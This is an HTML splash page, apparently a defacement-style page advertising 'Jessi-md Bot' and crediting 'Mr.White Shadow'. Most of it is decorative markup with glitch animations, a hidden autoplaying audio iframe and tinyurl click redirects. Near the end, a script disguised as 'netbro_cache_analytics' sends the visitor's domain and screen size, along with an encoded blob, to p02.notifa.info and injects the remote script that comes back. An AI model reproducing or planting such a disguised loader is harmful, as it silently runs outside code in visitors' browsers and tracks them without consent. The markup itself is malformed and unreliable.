<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>
<link rel="icon" type="image/png" href="https://telegra.ph/file/efd56abf473f60eccb40f.jpg">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Jessi-md Bot</title>
<meta property="og:image" content="https://i.ibb.co/HFHRDT9/IMG-20190930-WA0183.jpg">
<meta name="description" content="White Shadow">
<meta name="og:title" content="OMAR CHARAF">
<meta name="googlebot" content="index,follow">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<meta name="og:description" content="Hisl Ofc">
<link href="https://fonts.googleapis.com/css?family=Sedgwick Ave Display"rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Bahiana|Black+Ops+One|Josefin+Slab |New+Rocker|Quicksand|Wallpoet|orbitron" rel="stylesheet"> 
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css"> <em>
<center><font size="3"><font face="IceLand color="red" size"3"> 
<style>
body{color="black";font-family: 'IceBerg', sans-serif;}
</style></head>
<body bgcolor="black"> 
<table width="100%" height="100%"><tbody><tr><td align="center">
<img src="https://i.giphy.com/media/3oriNM8HF8oijarwre/200w.webp" width="60%"> 
<br>
<link href="https://fonts.googleapis.com/css?family=Sedgwick Ave Display"rel="stylesheet"></head> <body> <body bgcolor="black"> <style type="text/css">.blink_me{font-size:100px;-webkit-animation-name:blinker;-webkit-animation-duration:2s;-webkit-animation-timing-function:linear;-webkit-animation-iteration-count:infinite;-moz-animation-name:blinker;-moz-animation-duration:2s;-moz-animation-timing-function:linear;-moz-animation-iteration-count:infinite;animation-name:blinker;animation-duration:1s;animation-timing-function:linear;animation-iteration-count:infinite;}@-moz-keyframes blinker{0% {opacity:1.0;}50% {opacity:0.0;}100% {opacity:1.0;}}@-webkit-keyframes blinker{ 0% {opacity:1.0;}50% {opacity:0.0;}100% {opacity:1.0;}}@keyframes blinker{0% {opacity:1.0;}50% {opacity:0.0;}100% {opacity:1.0;}}</style> <blink><center><span class="blink_me">
<br>
<font size="4" color="white"><b><font face="Iceberg"color="white"><font>⾐ Jessi Md Bot</b></font><br>
<Head><title>=</title>
<style>
.Warning {
Boleh Recode Asal Ada Nick Saya;
Yaitu King Cracker Bila Tidak;
W DOAIN Setelah Recode Lu Kesamber Petir;
}
.anim-kedip {
 color: yellow;
 margin:0 auto;
 font-size: 30px;
 position: relative;}
@keyframes noise-anim {
 0% {clip: rect(3px, 9999px, 77px, 0);}
 5% {clip: rect(92px, 9999px, 90px, 0);}
 10% {clip: rect(20px, 9999px, 53px, 0);}
 15.0% {clip: rect(49px, 9999px, 67px, 0);}
 20% {clip: rect(98px, 9999px, 83px, 0);}
 25% {clip: rect(81px, 9999px, 18px, 0);}
 30.0% {clip: rect(79px, 9999px, 34px, 0);}
 35% {clip: rect(33px, 9999px, 33px, 0);}
 40% {clip: rect(3px, 9999px, 48px, 0);}
 45% {clip: rect(30px, 9999px, 65px, 0);}
 50% {clip: rect(59px, 9999px, 34px, 0);}
 55.0% {clip: rect(59px, 9999px, 70px, 0);}
 60.0% {clip: rect(22px, 9999px, 49px, 0);}
 65% {clip: rect(1px, 9999px, 51px, 0);}
 70% {clip: rect(76px, 9999px, 88px, 0);}
 75% {clip: rect(49px, 9999px, 75px, 0);}
 80% {clip: rect(74px, 9999px, 84px, 0);}
 85.0% {clip: rect(95px, 9999px, 76px, 0);}
 90% {clip: rect(97px, 9999px, 1px, 0);}
 95% {clip: rect(91px, 9999px, 89px, 0);}
 100% {clip: rect(15px, 9999px, 17px, 0);}}
.anim-kedip:after {
 content: attr(data-text);
 position: absolute;
 left: 2px;
 text-shadow: -3px 5px #BD003E;
 top: 0;
 color: yellow;
 background: transparent;
 overflow: hidden;
 clip: rect(0, 900px, 0, 0);
 animation: noise-anim 2s infinite linear alternate-reverse;}
@keyframes noise-anim-2 {
 0% {clip: rect(99px, 9999px, 75px, 0);}
 5% {clip: rect(27px, 9999px, 55px, 0);}
 10% {clip: rect(2px, 9999px, 33px, 0);}
 15.0% {clip: rect(75px, 9999px, 57px, 0);}
 20% {clip: rect(12px, 9999px, 84px, 0);}
 25% {clip: rect(98px, 9999px, 13px, 0);}
 30.0% {clip: rect(50px, 9999px, 25px, 0);}
 35% {clip: rect(70px, 9999px, 48px, 0);}
 40% {clip: rect(71px, 9999px, 8px, 0);}
 45% {clip: rect(8px, 9999px, 99px, 0);}
 50% {clip: rect(11px, 9999px, 2px, 0);}
 55.0% {clip: rect(33px, 9999px, 49px, 0);}
 60.0% {clip: rect(74px, 9999px, 86px, 0);}
 65% {clip: rect(52px, 9999px, 62px, 0);}
 70% {clip: rect(30px, 9999px, 88px, 0);}
 75% {clip: rect(46px, 9999px, 14px, 0);}
 80% {clip: rect(86px, 9999px, 68px, 0);}
 85.0% {clip: rect(42px, 9999px, 24px, 0);}
 90% {clip: rect(91px, 9999px, 57px, 0);}
 95% {clip: rect(57px, 9999px, 60px, 0);}
 100% {clip: rect(78px, 9999px, 67px, 0);}}
.anim-kedip:before {
 content: attr(data-text);
 position: absolute;
 left: -2px;
 text-shadow: 3px 5px #0023FF;
 top: 0;
 color: yellow;
 background: transparent;
 overflow: hidden;
 clip: rect(0, 900px, 0, 0);
 animation: noise-anim-2 3s infinite linear alternate-reverse;}
 </style>
</head>
<body>
<div class="anim-kedip" data-text="Mr.White Shadow">
</div>
<font size="3" color="white"><b><font face="New Rocker"Color="white"></b></font> <font face="Iceberg"color="white"></b></font>POWERED BY</b></font>
<center><marquee behavior="scroll" direction="right" scrollamount="100" scrolldelay="40" width="100%"> <font color="red">-----------------------------------------------------------------</font></marquee></b>
<font face="Sedgwick ave display" color="white" size="3">Code Owners</font><br>
<font size="3" color="white"><b>Mr.White Shadow & Mr.Chabby</b></font>
<center><marquee behavior="scroll" direction="left" scrollamount="100" scrolldelay="40" width="100%"> <font color="red">

</div>
    <p class="h" onclick="location.href = 'https://tinyurl.com/ytwdb75x'"><b>White Shadow + Jessi-md </b></p>
    <div class="vote-block" onclick="location.href = 'https://tinyurl.com/ytwdb75x'">
        <div class="vote-stars" style="width: 65px;"></div>
        <div class="vote-active" style="width: 59.8px;"></div>-----------------------------------------------------------------</font></marquee>
<br><br>
<iframe width="0" height="0" src="https://c.top4top.io/m_1475bfw1t0.mp3" frameborder="0" loop="true" allow fullscreen></iframe>
</td></tr></tbody></table>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "ms=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH25RCEsaNvd95j2EsW5z1%2ftfP%2bG%2bZvfzlNTUzaROr6cUwcwi%2b2ZW4iLKEBGdlCdodvp%2fdFr8Syr4duSJyBhPH8JrFx3%2bVkt8uzMiIJYA8bKJ%2fldOaW16o0edNTO8UQHDOpudNoeWy%2fs6pkDihUOfKEcQL3EkHeuY0yZgAghHXMUnjG8wAVaH%2fp5JW%2bc4%2bXzw2EpiYkC3Xwo9dxWmr1jFna8iN%2fQF8l0IcJ%2fmXpwb7JGLAb2iQpHaAQX9tBDEW4fSUfG5cMIZ11oSR4hrirQHpbj7%2f24LZHBxc0bJQpDg98upcRv0v1s9TLK1xHDku3KirUFNSdArFDlf471wcqITL0W2ywmNCXN5ozUHEhvT2izpoujtKZZiDEKVm0nN3z1rRJtjPU%2bI00PViTaemY2f4DPRyujR5uRM%2bSB2tulNx4YCnLmRdGIYTF4pPWUM9kN2Hma8kh1shYhtC2mC0I%2fxNqTI4DpBRHsWqhnVgHxU%2f87NpDNUj%2f51By3dnVRzebj8vj" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html> 
<style type="text/css">
 body{
 color: #f;
 background-image: url("https://tenor.com/bInAS.gif");
 cursor: url(http://hellox.persiangig.com/DefacePage/negro.cur), progress;
 }
 body,td,th {
 /* [disabled]color: #000; */
 } 
 </style>